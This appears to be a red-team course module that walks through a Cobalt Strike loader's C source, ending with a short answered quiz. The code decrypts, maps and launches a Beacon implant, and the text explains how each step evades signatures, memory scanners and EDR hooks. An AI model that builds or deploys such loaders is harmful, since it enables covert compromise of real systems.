Difficulty: Intermediate

Module 5: The UDRL Loader Walkthrough

A line-by-line analysis of Crystal-Loaders' udrl/src/loader.c — the single C source file that decrypts, loads, and launches Beacon.

Module Objective

This is the core module of the course. We walk through every step of the actual loader.c source code: from extracting encrypted resources, through PE loading with LibTCG primitives, to the three-call Beacon initialization protocol. By the end you will understand exactly how a Crystal-Loaders UDRL turns a raw encrypted blob into a running Cobalt Strike Beacon.

1. File Overview

The loader is a single C source file compiled with MinGW into position-independent code. It has no standard C runtime — every external function is resolved at runtime through Crystal Palace's DFR (Dynamic Function Resolution) mechanism.

Include Headers

The file includes four headers, each providing a distinct capability layer:

C - loader.c includes#include <windows.h>
#include "beacon.h"    // BUD structures from Cobalt Strike
#include "gate.h"      // LibGate indirect syscalls
#include "tcg.h"       // LibTCG PE loading primitives

Header Responsibilities

HeaderProvides
windows.hStandard Windows type definitions (LPVOID, DWORD, BOOL, etc.)
beacon.hCobalt Strike BUD structures: USER_DATA, SYSCALL_API, RTL_API, ALLOCATED_MEMORY
gate.hLibGate indirect syscall stubs and resolution functions
tcg.hLibTCG PE primitives: ParseDLL, LoadDLL, ProcessImports, EntryPoint (note: FixSectionPermissions is defined locally in loader.c, not in tcg.h)

BOF-Style DLL Imports

Instead of normal import table entries (which would require an IAT and break position independence), the loader declares every external function using DECLSPEC_IMPORT with the LIBRARY$Function naming convention. Crystal Palace's DFR rewrites these at link time into hash-based runtime resolution calls.

C - BOF-style importsDECLSPEC_IMPORT LPVOID  WINAPI KERNEL32$VirtualAlloc(LPVOID, SIZE_T, DWORD, DWORD);
DECLSPEC_IMPORT BOOL    WINAPI KERNEL32$VirtualProtect(LPVOID, SIZE_T, DWORD, PDWORD);
DECLSPEC_IMPORT BOOL    WINAPI KERNEL32$VirtualFree(LPVOID, SIZE_T, DWORD);
DECLSPEC_IMPORT int            MSVCRT$strncmp(const char *, const char *, size_t);

Why BOF-Style?

This naming convention originates from Cobalt Strike's Beacon Object Files (BOFs). The LIBRARY$Function pattern tells the Crystal Palace linker to replace each call site with an invocation of resolve(LIBRARY_HASH, Function_HASH). The result: the compiled PIC blob has zero IAT entries and resolves every API call at runtime through PEB walking and EAT parsing.

Key Defines

C - defines#define NTDLL_HASH    0x3CFA685D           // ROR13 hash of "ntdll.dll"
#define memset(x,y,z) __stosb((PBYTE)(x),(BYTE)(y),(SIZE_T)(z))
#define GETRESOURCE(x) (char *)&x

Define Breakdown

DefinePurpose
NTDLL_HASHPre-computed ROR13 hash of the string "ntdll.dll" — used by ResolveSyscalls to find ntdll without string comparison
memsetMacro replacing standard memset with the compiler intrinsic __stosb — avoids linking to the C runtime
GETRESOURCECasts a zero-length array (section marker) to a char *, giving access to the length-prefixed data that Crystal Palace linked into that section

2. Embedded Resources

Crystal Palace links the encrypted Beacon DLL and XOR key into named PE sections at build time. The loader accesses them through zero-length array markers — a technique that produces no data in the object file but provides a symbol pointing to the start of the section.

C - section markers// Zero-length arrays in custom sections — Crystal Palace fills these at link time
char _DLL_[0] __attribute__((section("dll")));
char _KEY_[0] __attribute__((section("key")));

The RESOURCE Structure

Every embedded resource is stored as a length-prefixed byte array. The first field is an int length, followed by a char value[] flexible array member. This structure lets the loader know exactly how many bytes to process without relying on sentinel values or section headers.

C - RESOURCE typedeftypedef struct {
    int  length;
    char value[];
} RESOURCE;

Crystal Palace Link Pipeline

Beacon DLL
raw bytes
XOR Encrypt
128-bit key
Prepend Length
4-byte DWORD
Link into
"dll" section

When Crystal Palace's spec file processes push $DLL / xor $KEY / preplen / link "dll", the pipeline executes these four steps:

Spec Pipeline Steps

StepSpec CommandAction
1push $DLLPush the raw Beacon DLL bytes onto the spec stack
2xor $KEYXOR the top-of-stack with a generated 128-bit key
3preplenPrepend a 4-byte length field (creating the RESOURCE structure)
4link "dll"Link the result into the "dll" section of the final PIC blob

3. The go() Entry Point — Full Walkthrough

The go() function is the loader's entry point — the first code that executes when the PIC blob runs. It orchestrates the entire loading sequence in nine discrete steps. Each step has a single responsibility and builds on the previous one.

go() Execution Pipeline

Get Resources
Step 1
XOR Unmask
Step 2
Parse PE
Step 3
Load DLL
Step 4
Init BUD
Step 5
Fix Perms
Step 6-7
Resolve APIs
Step 8
Call Beacon
Step 9

Step 1 — Get Embedded Resources

The loader retrieves pointers to the encrypted Beacon DLL and the XOR key from their respective PE sections using the GETRESOURCE macro.

C - Step 1RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);

What GETRESOURCE Returns

GETRESOURCE(_DLL_) expands to (char *)&_DLL_. Since _DLL_ is a zero-length array at the start of the "dll" section, its address points directly to the RESOURCE structure that Crystal Palace linked there. The caller then casts the result to RESOURCE *. The dll->length field gives the encrypted payload size, and dll->value points to the encrypted bytes.

Step 2 — Allocate + XOR Unmask

A fresh RW buffer is allocated for the decrypted Beacon DLL. Each byte of the encrypted payload is XOR'd with the corresponding byte of the rotating key.

C - Step 2// Allocate RW buffer for the decrypted Beacon DLL
PBYTE src = KERNEL32$VirtualAlloc(NULL, dll->length,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// XOR-unmask: each byte of payload XOR'd with rotating key
for (DWORD i = 0; i < dll->length; i++)
    src[i] = dll->value[i] ^ key->value[i % key->length];

Key Rotation

The expression i % key->length implements key rotation. The 128-bit (16-byte) key repeats every 16 bytes of the payload. This is a simple XOR cipher — not cryptographically strong, but sufficient to prevent static signature detection of the Beacon DLL on disk and in the PIC blob.

Step 3 — Parse PE

LibTCG's ParseDLL reads the PE headers from the decrypted buffer and populates a DLLDATA structure with section info, import table pointers, relocation data, and entry point offset.

C - Step 3DLLDATA data;
memset(&data, 0, sizeof(DLLDATA));
ParseDLL(src, &data);

DLLDATA Contents

After ParseDLL, the data structure contains everything needed to manually load the DLL: the IMAGE_NT_HEADERS pointer, the section table, import directory RVA, relocation directory RVA, and the AddressOfEntryPoint. The original buffer (src) is still needed as the source of section data.

Step 4 — Allocate + Load DLL

A second allocation provides the final memory region where the Beacon DLL will live. LoadDLL copies sections to their correct virtual offsets, and ProcessImports resolves the Beacon DLL's own import table.

C - Step 4DWORD size = SizeOfDLL(&data);
PBYTE dst = KERNEL32$VirtualAlloc(NULL, size,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

LoadDLL(&data, src, dst);

// Initialize import resolution functions
IMPORTFUNCS funcs;
funcs.loadLibraryA = KERNEL32$LoadLibraryA;
funcs.getProcAddress = KERNEL32$GetProcAddress;
ProcessImports(&funcs, &data, dst);

LibTCG Loading Primitives

FunctionResponsibility
SizeOfDLLReturns SizeOfImage from the PE optional header — the total virtual size needed
LoadDLLTakes three arguments: DLLDATA, source buffer (src), and destination (dst). Copies each PE section from src to the correct offset in dst, applies base relocations
ProcessImportsTakes three arguments: an IMPORTFUNCS struct (holding LoadLibraryA and GetProcAddress pointers), DLLDATA, and destination. Walks the import descriptor table, resolves each imported function, patches the IAT

Step 5 — Initialize BUD (Beacon User Data)

The BUD (Beacon User Data) is a set of structures that the loader passes to Beacon. It provides Beacon with pre-resolved syscall stubs, RTL function pointers, and memory region metadata for sleep masking.

C - Step 5USER_DATA bud;
memset(&bud, 0, sizeof(USER_DATA));
bud.version = COBALT_STRIKE_VERSION;  // 0x041100 = CS 4.11

SYSCALL_API syscalls;
memset(&syscalls, 0, sizeof(SYSCALL_API));
bud.syscalls = &syscalls;

RTL_API rtlFunctions;
memset(&rtlFunctions, 0, sizeof(RTL_API));
bud.rtls = &rtlFunctions;

ALLOCATED_MEMORY memory;
memset(&memory, 0, sizeof(ALLOCATED_MEMORY));
bud.allocatedMemory = &memory;

BUD Sub-Structures

StructureFieldPurpose
USER_DATAversionCobalt Strike version identifier — Beacon uses this for compatibility checks
SYSCALL_APIbud.syscallsContains function pointers for 36 Nt* syscall stubs that Beacon calls instead of using ntdll directly
RTL_APIbud.rtlsContains pointers to Rtl* utility functions (rtlDosPathNameToNtPathNameUWithStatus, rtlFreeHeap, and rtlGetProcessHeap)
ALLOCATED_MEMORYbud.allocatedMemoryTracks memory regions so Beacon's sleep mask can encrypt/decrypt them during sleep cycles

Step 6 — Fix Section Permissions + Track Memory

After loading, all sections are RW. FixSectionPermissions iterates through each PE section and calls VirtualProtect with the correct permission flags. It also populates the ALLOCATED_MEMORY_REGION metadata so Beacon knows the layout of its own memory.

C - Step 6FixSectionPermissions(&data, dst, &memory.AllocatedMemoryRegions[0]);

Section Permission Mapping

SectionPermissionWindows Constant
.textExecute + ReadPAGE_EXECUTE_READ
.rdataRead OnlyPAGE_READONLY
.dataRead + WritePAGE_READWRITE
.pdataRead OnlyPAGE_READONLY
.relocRead OnlyPAGE_READONLY

Why Permissions Matter

Leaving all sections as RWX would work functionally but is a glaring detection indicator. EDR products flag RWX memory regions as suspicious. By applying the correct per-section permissions, the loaded Beacon DLL looks identical to a normally loaded DLL from the perspective of memory scanners.

Step 7 — Set Cleanup Info

The loader tells Beacon how the memory was allocated and whether Beacon should clean it up. This metadata is critical for Beacon's sleep masking — it needs to know the allocation method to correctly free or re-protect memory during sleep.

C - Step 7memory.AllocatedMemoryRegions[0].CleanupInformation.AllocationMethod = METHOD_VIRTUALALLOC;
memory.AllocatedMemoryRegions[0].CleanupInformation.Cleanup = TRUE;
memory.AllocatedMemoryRegions[0].Purpose = PURPOSE_BEACON_MEMORY;

Cleanup Fields

FieldValueMeaning
AllocationMethodMETHOD_VIRTUALALLOCMemory was allocated with VirtualAlloc (as opposed to NtMapViewOfSection or HeapAlloc)
CleanupTRUEBeacon should free this region when shutting down
PurposePURPOSE_BEACON_MEMORYThis region contains the Beacon DLL itself (not shellcode or other data)

Step 8 — Resolve Syscalls + RTL Functions

Two resolution functions populate the BUD sub-structures with live function pointers. These pointers allow Beacon to execute syscalls indirectly (through LibGate stubs) and call Rtl* utilities without importing them.

C - Step 8ResolveSyscalls(&syscalls);
ResolveRtlFunctions(&rtlFunctions);

Why Resolve at Load Time?

By resolving all 36 Nt* functions and the Rtl* utilities during loading, Beacon avoids making GetProcAddress calls during operation. Every API call Beacon makes goes through pre-resolved function pointers in the BUD. This eliminates a major detection surface: EDR products that hook GetProcAddress and LdrGetProcedureAddress will never see Beacon's resolution activity.

Step 9 — Get Entry Point, Clean Up, Call Beacon

The final step resolves the Beacon DLL's entry point, frees the decrypted buffer (no longer needed), and makes the three DllMain calls that constitute the Cobalt Strike initialization protocol.

C - Step 9DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);

// Free the decrypted buffer (no longer needed)
KERNEL32$VirtualFree(src, 0, MEM_RELEASE);

// Three DllMain calls — this is the Cobalt Strike protocol:
entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud);            // Pass BUD to Beacon
entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL);             // Standard DLL init
entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL);   // Start Beacon

Buffer Cleanup Timing

The decrypted buffer (src) is freed before calling Beacon's entry point. This is intentional: the buffer contains a fully decrypted copy of the Beacon DLL, which would be trivially detectable by a memory scanner. By freeing it before Beacon starts operating, the loader minimizes the window during which a cleartext DLL exists in memory. The loaded copy at dst has proper section permissions and looks like a normally loaded module.

4. The Three DllMain Calls

Unlike a normal DLL that receives a single DLL_PROCESS_ATTACH call, Cobalt Strike Beacon requires three separate DllMain invocations. Each call uses a different fdwReason value and passes different data through the parameters.

Three-Call Initialization Protocol

Call 1
DLL_BEACON_USER_DATA
reason = 0x0d
Call 2
DLL_PROCESS_ATTACH
reason = 0x01
Call 3
DLL_BEACON_START
reason = 0x04

Call-by-Call Breakdown

CallfdwReasonhinstDLLlpReservedPurpose
1DLL_BEACON_USER_DATA (0x0d)0 (unused)&budPasses the USER_DATA pointer to Beacon. Beacon stores references to SYSCALL_API, RTL_API, and ALLOCATED_MEMORY for later use.
2DLL_PROCESS_ATTACH (0x01)dst (base address)NULLStandard DLL initialization. Beacon sets up internal state, communication channels, and thread-local storage.
3DLL_BEACON_START (0x04)go (loader addr)NULLSignals Beacon to begin execution. The go function pointer is passed so Beacon can free the loader's memory region.

Call 1: DLL_BEACON_USER_DATA (0x0d)

This custom reason code (not a standard Windows constant) tells Beacon's DllMain that the lpReserved parameter contains a USER_DATA*. Beacon casts it and stores the three sub-structure pointers internally. These pointers are used throughout Beacon's lifetime:

Call 2: DLL_PROCESS_ATTACH (0x01)

This is the standard Windows DLL initialization call. Beacon uses this to perform one-time setup: initialize its configuration parser, set up named pipes or HTTP channels, configure sleep timers, and register exception handlers. The hinstDLL parameter receives the base address (dst) so Beacon knows where it is loaded in memory.

Call 3: DLL_BEACON_START (0x04)

The final call uses DLL_THREAD_ATTACH (0x04) which Beacon repurposes as a start signal. The hinstDLL parameter receives the go function pointer — the address of the loader itself. Beacon stores this address so it can later call VirtualFree on the loader's memory region, erasing the UDRL code from memory after initialization is complete.

Order Matters

The three calls must happen in this exact order. Call 1 must precede Call 2 because Beacon's DLL_PROCESS_ATTACH handler may use the syscall stubs that were passed in Call 1. Call 3 must be last because it starts the Beacon main loop, which never returns — any code after Call 3 will not execute.

5. The resolve() Function

The resolve() function is the bridge between BOF-style import declarations and runtime API resolution. Crystal Palace's DFR mechanism rewrites every KERNEL32$VirtualAlloc call into a resolve(KERNEL32_HASH, VirtualAlloc_HASH) call at link time.

C - resolve()char * resolve(DWORD modHash, DWORD funcHash)
{
    PVOID mod = findModuleByHash(modHash);
    return findFunctionByHash(mod, funcHash);
}

DFR Resolution Flow

Source Code
KERNEL32$VirtualAlloc(...)
DFR Rewrite
resolve(K32_HASH, VA_HASH)
PEB Walk
findModuleByHash
EAT Walk
findFunctionByHash

Resolution Internals

FunctionMechanismReturns
findModuleByHashWalks the PEB's InLoadOrderModuleList, computes ROR13 hash of each DLL name, compares against modHashBase address of the target DLL
findFunctionByHashParses the DLL's Export Address Table (EAT), computes ROR13 hash of each export name, compares against funcHashAddress of the target function

No Strings in the Binary

Because every module and function name is converted to a ROR13 hash at compile time, the final PIC blob contains no API name strings whatsoever. Static analysis tools that search for strings like "VirtualAlloc" or "NtAllocateVirtualMemory" will find nothing. The only way to determine what APIs the loader calls is to reverse-engineer the hash values or analyze the code dynamically.

6. ResolveSyscalls() — All 36 Nt* Functions

ResolveSyscalls populates the SYSCALL_API structure with resolved entries for every Nt* function that Beacon supports. Each entry contains both the function address and the syscall number (SSN), enabling LibGate's indirect syscall mechanism.

C - ResolveSyscalls()void ResolveSyscalls(SYSCALL_API * syscalls)
{
    PVOID ntdll = findModuleByHash(NTDLL_HASH);

    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtAllocateVirtualMemory_HASH),
        &syscalls->ntAllocateVirtualMemory);
    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtProtectVirtualMemory_HASH),
        &syscalls->ntProtectVirtualMemory);
    // ... 34 more Nt* functions
    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtWaitForMultipleObjects_HASH),
        &syscalls->ntWaitForMultipleObjects);
}

ResolveSyscallEntry Internals

Each call to ResolveSyscallEntry does three things:

  1. Stores the function address in the SYSCALL_API_ENTRY
  2. Reads the SSN (System Service Number) from the mov eax, SSN instruction at the start of the ntdll stub
  3. Locates the syscall instruction within the stub for indirect syscall execution

Complete SYSCALL_API — All 36 Nt* Functions

The following table lists every Nt* function in the Beacon SYSCALL_API structure (field names use lowercase nt prefix). These cover all system-level operations that Beacon performs: memory management, process/thread manipulation, file I/O, and object management.

#Field NameCategory
1ntAllocateVirtualMemoryMemory
2ntProtectVirtualMemoryMemory
3ntFreeVirtualMemoryMemory
4ntGetContextThreadThread
5ntSetContextThreadThread
6ntResumeThreadThread
7ntCreateThreadExThread
8ntOpenProcessProcess
9ntOpenThreadThread
10ntCloseObject
11ntCreateSectionMemory
12ntMapViewOfSectionMemory
13ntUnmapViewOfSectionMemory
14ntQueryVirtualMemoryMemory
15ntDuplicateObjectObject
16ntReadVirtualMemoryMemory
17ntWriteVirtualMemoryMemory
18ntReadFileFile I/O
19ntWriteFileFile I/O
20ntCreateFileFile I/O
21ntQueueApcThreadThread
22ntCreateProcessProcess
23ntOpenProcessTokenToken
24ntTestAlertThread
25ntSuspendProcessProcess
26ntResumeProcessProcess
27ntQuerySystemInformationSystem
28ntQueryDirectoryFileFile I/O
29ntSetInformationProcessProcess
30ntSetInformationThreadThread
31ntQueryInformationProcessProcess
32ntQueryInformationThreadThread
33ntOpenSectionMemory
34ntAdjustPrivilegesTokenToken
35ntDeviceIoControlFileFile I/O
36ntWaitForMultipleObjectsSynchronization

Category Breakdown

CategoryCountExamples
Memory10ntAllocateVirtualMemory, ntProtectVirtualMemory, ntFreeVirtualMemory, ntCreateSection, ntMapViewOfSection, ntOpenSection
Thread9ntGetContextThread, ntSetContextThread, ntResumeThread, ntCreateThreadEx, ntQueueApcThread, ntTestAlert
Process6ntOpenProcess, ntCreateProcess, ntSuspendProcess, ntResumeProcess, ntSetInformationProcess, ntQueryInformationProcess
File I/O5ntReadFile, ntWriteFile, ntCreateFile, ntQueryDirectoryFile, ntDeviceIoControlFile
Token2ntOpenProcessToken, ntAdjustPrivilegesToken
Object2ntClose, ntDuplicateObject
System1ntQuerySystemInformation
Synchronization1ntWaitForMultipleObjects

Module 5 Quiz: The UDRL Loader Walkthrough

Q1: What value is DLL_BEACON_USER_DATA?

Correct! DLL_BEACON_USER_DATA is 0x0d. This is a custom reason code (not a standard Windows constant) that tells Beacon's DllMain to interpret the lpReserved parameter as a USER_DATA pointer. The standard DLL_PROCESS_ATTACH is 0x01 and DLL_BEACON_START repurposes 0x04 (DLL_THREAD_ATTACH).

Q2: Why does the loader pass go as the hinstDLL parameter in the DLL_BEACON_START call?

Correct! The go function pointer gives Beacon the address of the loader's code in memory. After Beacon finishes initialization, it calls VirtualFree on this address to erase the UDRL loader from memory entirely. This is a cleanup measure — once the Beacon DLL is loaded and running, the loader code is no longer needed and its presence in memory would be an unnecessary detection surface.

Q3: How many Nt* functions does the SYSCALL_API structure support?

Correct! The SYSCALL_API structure in beacon.h defines exactly 36 SYSCALL_API_ENTRY slots for Cobalt Strike 4.11. These cover all system-level operations Beacon needs: memory management (10), thread operations (9), process operations (6), file I/O (5), token operations (2), object management (2), system queries (1), and synchronization (1).